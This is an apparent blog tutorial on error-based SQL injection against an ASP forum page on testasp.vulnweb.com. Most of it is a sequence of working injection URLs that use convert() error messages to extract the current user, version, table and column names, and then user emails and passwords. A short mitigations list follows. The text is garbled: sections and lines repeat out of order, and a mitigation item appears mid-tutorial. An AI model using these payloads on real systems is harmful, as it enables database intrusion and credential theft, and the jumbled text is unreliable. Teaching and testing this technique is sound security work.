Here is my new write up Error Based SQL Injection.....
Generally, we perform error based SQL Injection on ASP or ASPX websites. It is similar to PHP but the different is we do not use the queries that contain Union Select, Order by, Group by etc. Though we trick the server to get the information which we want. Server gives the information in response in the form of error message. That's why we called Error Based SQL Injection. :)
Here is example....
Target URL:- http://testasp.vulnweb.com/showforum.asp?id=1
As I previously described that first we need to check that application is vulnerable or not to do this we will insert a quote ('), It will break the quarry and generate error. Here it is....
http://testasp.vulnweb.com/showforum.asp?id=1'
Now we extract Column Name :-
http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users'))--+
All Column Name :-
http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in ('uname','upass','email','realname','avatar')))--+
After finding table name and column name we extract email and password.
For email :-
http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int,(select top 1 email from users))
For Password :-
http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int,(select top 1 upass from users))
2- Use stored procedures or prepared statements. This will ensure the attacker will not modify the intention of the query.
Generally, we perform error based SQL Injection on ASP or ASPX websites. It is similar to PHP but the different is we do not use the queries that contain Union Select, Order by, Group by etc. Though we trick the server to get the information which we want. Server gives the information in response in the form of error message. That's why we called Error Based SQL Injection. :)
Here is example....
Target URL:- http://testasp.vulnweb.com/showforum.asp?id=1
As I previously described that first we need to check that application is vulnerable or not to do this we will insert a quote ('), It will break the quarry and generate error. Here it is....
http://testasp.vulnweb.com/showforum.asp?id=1'
After generate error we need to patch it to do this we used (--+) to comment rest of the quarry.
http://testasp.vulnweb.com/showforum.asp?id=1--+
In error based SQL injection we don't need to find out number of columns, we directly extract table name, column name.
First we look for current user :-
http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int, (select current_user))--+
http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int, (select current_user))--+
Here it tries to convert quarry into integer but due to failure it generate error which we wants.
Version details :-
http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int, (select @@version))--+
http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int, (select @@version))--+
Database Name :-
http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int, (select db_name()))--+
http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int, (select db_name()))--+
Table Name :-
http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int, (select top 1 table_name from information_schema.tables))--+
http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int, (select top 1 table_name from information_schema.tables))--+
Here top extract the table name which were on top in database.
To extract second name of table we will use NOT IN.
To extract second name of table we will use NOT IN.
http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('threads')))--+
Extract Third name of table name and son on....
http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('threads', 'users')))--+
All Table :-
http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('threads', 'users','forums','posts')))--+
http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('threads', 'users')))--+
All Table :-
http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in('threads', 'users','forums','posts')))--+
http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users'))--+
http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in ('uname','upass','email','realname','avatar')))--+
For email :-
http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int,(select top 1 email from users))
http://testasp.vulnweb.com/showforum.asp?id=1 and 1=convert(int,(select top 1 upass from users))
Mitigations :-
1- Implement a check for any SQL keywords (e.g. SELECT, UNION, NOT IN) and bad characters (e.g. !#$%&'*+-/=?^_`{|}~@[]). If the request contains any bad keywords/characters then do not proceed with the request. Note: This is to be done on the application side before the requests get to the database.
2- Use stored procedures or prepared statements. This will ensure the attacker will not modify the intention of the query.
3- Disable features and services which are unnecessary for operations.
4- Run the database and any applications querying the database with the lowest possible privileges.
5- Stay up to date with vendor patches after they have been thoroughly tested within your environment.
No comments:
Post a Comment